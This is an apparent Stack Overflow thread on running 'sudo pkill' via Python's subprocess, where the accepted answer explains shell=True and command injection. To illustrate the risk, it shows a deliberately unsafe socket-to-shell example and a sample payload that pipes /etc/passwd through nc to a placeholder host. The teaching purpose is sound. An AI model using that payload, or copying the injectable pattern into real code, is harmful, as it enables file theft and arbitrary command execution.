# Launch linux command via python subprocess doesn't work as expected

Tags: python, linux, python-2.7, ubuntu, subprocess

I'm trying to kill a specific python process launched earlier, lets call it `test.py`.
The command in linux which terminates it is : `sudo pkill -f test.py`->  works like a charm.

However when trying to launch via python code:
`subprocess.Popen('sudo pkill -f test.py', stdout=subprocess.PIPE)`
I get a stacktrace with `OSError: [Errno 2] No such file or directory`

Any idea what am I doing wrong?

Comment: You need to use `os.killpg` to kill a process. For that you need the `pid` of the process.

Comment: @jayant The `sudo` part will be hard to emulate using a syscall...

Answer (score 3, accepted):

By default, `subprocess.Popen` will interpret a string argument as the exact command name. So, you pass a string `foo bar`, it will attempt to locate an executable named `foo bar` and invoke it without arguments. Unlike an interactive shell, it will **not** execute the command `foo` with the single argument `bar`.

When you type `foo "bar baz"` or `foo | bar` into a shell, it is the shell that splits the argument line into words and interprets those words as command name, arguments, pipe delimiters, redirection operators, etc. The simplest way for `subprocess.Popen` to do this kind of input interpretation same is by using `shell=True` to request that the argument be passed through a shell:

```
subprocess.Popen('sudo pkill -f test.py', shell=True, stdout=subprocess.PIPE)
```

Unfortunately, as [noted in the documentation](https://docs.python.org/2.7/library/subprocess.html#frequently-used-arguments), this convenient shortcut has security implications. Using `shell=True` is safe as long as the command to run is fixed (and ignoring the obvious security implications of allowing apparently password-less `sudo`.) The problem arises when the arguments are assembled from pieces that come from other sources. For example:

```
# XXX security risk
subprocess.Popen('sudo pkill -f %s' % socket.read(), shell=True,
                 stdout=subprocess.PIPE)
```

Here we are reading the argument from a network connection, and splicing it into a string passed to the shell. Aside from the obvious problem of a maliciously crafted peer being able to kill an arbitrary process on the system (as root, no less), it is actually worse than that. Since the shell is a general tool, an attacker can use [command substitution](https://www.gnu.org/software/bash/manual/html_node/Command-Substitution.html) and similar features to make the system do anything it wants. For example, if the socket sends the string `$(cat /etc/passwd | nc SOMEHOST; echo process-name)`, the `Popen` above will use the shell to execute:

```
sudo pkill -f $(cat /etc/passwd | nc SOMEHOST; echo process-name)
```

This is why it is generally advised not to use `shell=True` **on untrusted input**. A safer alternative is to avoid running the shell:

```
# smaller risk
cmd = ['sudo', 'pkill', '-f', socket.read()]
subprocess.Popen(cmd, stdout=subprocess.PIPE)
```

In this case, even if a malicious peer slips something weird into the string, it will not be a problem because it will be literally sent to the command to execute. In the above example, the `pkill` command would get a request to kill a process named `$(cat ...)`, but there would be no shell to interpret this request to execute the command inside the parentheses.

Even without a shell, invocation of external commands with untrusted input can still be unsafe in case the command executed (in this case `sudo` or `pkill`) is itself vulnerable to injection attacks.

Comment: Thanks, but I heard that `shell=true` is not recommanded due to security reason, maybe there is another workaround without `shell`?

Comment: In addition I would like to know what the exact meaning of `shell=true`,
I not sure I understand its exact meaning

Comment: @JavaSa I've expanded the answer to include more information on `shell=True`. Also, don't forget to consult [the documentation](https://docs.python.org/2.7/library/subprocess.html#frequently-used-arguments).

Comment: Thank you very much for your very informative answer,  I got it now except that didn't understand why the second option has much smaller risk, as both examples read from external source.

Comment: @JavaSa Because, when there is no shell involved, there is no reason why `$(cat ...)` would be interpreted as anything other than a regular argument. I've updated the answer to mention that explicitly.